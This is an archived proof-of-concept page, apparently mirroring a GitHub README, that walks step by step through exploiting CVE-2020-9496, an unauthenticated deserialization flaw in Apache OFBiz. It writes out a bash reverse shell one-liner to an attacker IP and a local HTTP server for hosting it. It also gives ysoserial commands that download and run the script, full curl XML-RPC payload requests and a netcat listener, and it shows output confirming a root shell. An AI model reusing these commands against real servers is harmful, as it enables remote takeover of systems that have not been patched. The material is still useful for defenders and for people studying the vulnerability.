Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-9496 PoC — Apache OFBiz 代码问题漏洞

Source
https://github.com/cyber-niz/CVE-2020-9496
Associated Vulnerability
Title:Apache OFBiz 代码问题漏洞 (CVE-2020-9496)
Description:XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
Description
CVE-2020-9496 manual exploit
Readme
# CVE-2020-9496 - RCE
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.

This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

# Affected Version 17.12.01

# Fixed Versions 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

For this POC to work we need to drop a shell script and execute/access that file via curl.

### STEP 1: Create A Shell File With Bash One-liner With Your IP Address & Port Address.

```
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1
```
### STEP 2: Now We Need To Make This File Available via HTTP Service

```
$ sudo python3 -m http.server 80
```

### STEP 3: Generate Payload via ysoserial  - Change IP

```
$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"
```

### STEP 4: Copy The Output of Your Payload - Very Long String

```
rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
```

### STEP 5: Use the below curl command to execute our payload. Paste payload after extensions”>
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### Curl Command Without Payload For Your Reference

```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```

### Make Sure Whether You Got A Hit On HTTP Server After Curl Command Execution

```
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -
```
As you can see we got a hit on our HTTP server. File has been downloaded to /tmp directory named as shell.sh. Now to execute that file create payload again. But before you do that start a netcat listener.

### STEP 6: Start NetCat Listener

```
$ nc -lvnp 1337
listening on [any] 1337 ...
```

### STEP 7: Create Payload To Execute Previously Downloaded Shell Script

```
$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 8: Copy & Paste The Output Inside Curl Command & Execute It

```
curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### STEP 10: Check NetCat Listener For Reverse Connection

```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
```
File Snapshot

 [4.0K]  /data/pocs/7b7246682bc76e6b6d8c92e86f1ed29af97e15e8
└── [4.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →